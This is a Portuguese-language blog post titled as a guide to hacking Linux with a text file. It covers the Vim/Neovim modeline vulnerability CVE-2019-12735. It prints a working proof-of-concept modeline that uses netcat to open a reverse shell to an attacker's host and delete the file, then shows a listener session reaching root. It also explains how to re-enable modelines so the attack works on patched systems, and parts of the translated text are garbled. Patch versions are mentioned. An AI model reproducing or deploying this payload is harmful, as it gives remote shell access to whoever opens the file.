WWW.FLEPS.COM.BR

Como hackear o Linux com um arquivo de texto (.txt)

By admin at 2019-06-12 • 0 colecionador • 759 visualizações de página

Nova vulnerabilidade no "Vim" e "Neovim" permite a execução de comandos 

Resultado de imagem para hacking text


Não muito tempo atrás, o pesquisador Armin Razmjou descobriu uma falha que faz com que ele vulnerável a qualquer Linux que tem o famoso e amado editor de texto "Vim" e Fork "Neovim" , Vulnerabilidade registrada como CVE-2019-12735. 


Mas o que é o Vim? 

Vim, por sua sigla em inglês "Vi improved" é uma versão melhorada do editor de texto vi, presente em todos os sistemas UNIX. Seu autor, Bram Moolenaar, apresentou a primeira versão em 1991, data da qual ele experimentou muitas melhorias. 

Vulnerabilidade 

Esta falha é devido a um recurso chamado "modelines",

Esse recurso é habilitado por padrão nesses editores, um recurso que, se o usuário quiser desativá-lo, o problema reside no fato de que a maioria dos usuários não o faz, causando possível controle total de um invasor. 

Ao apelidar o título deste artigo com um arquivo de texto simples com uma modelina simples e específica, é possível obter o código executado diretamente na memória do sistema. Embora Vim e Neovim possam executar comandos perigosos dentro de uma sandbox, usando "source" na linha de código, você pode sair desse isolamento. 

Prova de conceito 

Neste artigo, eu não quero apenas tocar na teoria, mas também na prática, para isso, criaremos apenas um arquivo de texto chamado "poc.txt" (para este exemplo),https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md "para obter o controle do sistema remoto ou que poderia ser simplificada como um shell remoto com uma conexão Reversa usando o canivete suíço "Netcat":

Código: 

:!nohup nc <ip> <puerto> -e <shell> >> /tmp/nohup.dat 2>> /tmp/nohup.dat & rm <nombre del archivo> >> /tmp/nohup.dat 2>> /tmp/nohup.dat||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="


Exemplo

Código: 

:!nohup nc 127.0.0.1 4444 -e /bin/sh >> /tmp/nohup.dat 2>> /tmp/nohup.dat & rm poc.txt >> /tmp/nohup.dat 2>> /tmp/nohup.dat||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="


Claro que temos que ter netcat ouvindo:

Código: 

nc -vlp 4444


Uma vez conectado, podemos executar comandos remotamente:

Código: 

[email protected] ~# nc -vlp 9999
listening on [any] 9999 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 42730
whoami
root



Patches e soluções 

Se você foi para o computador e iniciar o, quiet / ou e os responsáveis por Vim e Neovim lançado seus patches para corrigir vulnerabilidades causadas por esses mesmos assim como para continuar a usar estes incrível janela editores. No caso do Vim, o patch que o protege é "8.1.1365", e em Neovim é a versão "0.3.6". 

Vim e Neovim não são vulneráveis, vamos violá-los! 

Se, ah não ser neste caso, não são vulneráveis, mas quer fazer a prova de conceito, você pode conseguir a partir do arquivo de configuração Vim, a maioria localizada em '/ etc / vim / vimrc', mas primeiro verificar executando a seguinte instrução com Vim aberto:

Código: 

# Presionamos ":" y colocamos set modeline?
# Si nos retorna "modeline" es porque somos vulnerables a este ataque y si no, nos retornaria "nomodeline"
# Y si quiero cambiarlo a "modeline" en caso de que nos retorne "modeline", colocamos el siguiente codigo en el archivo de ćonfiguracion de Vim "/etc/vim/vimrc"
# set modeline
# Y para ver si la prueba es exitosa, realiza el POC y me dices que tal ...



Todas as perguntas, comentários deixe-me saber se você quer mais itens de notícias fresco do forno?

Referências: 

https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md 
https : //www.redeszone.net/2019/06/11/vulnerabilidad-linux-hackearlo-archivo-texto/



Requer login

Loading...
:79::65::p:78::57:;):77::51::D:76:
:2::icon_syria_lovely::o:75::1::):clap::71::(:70: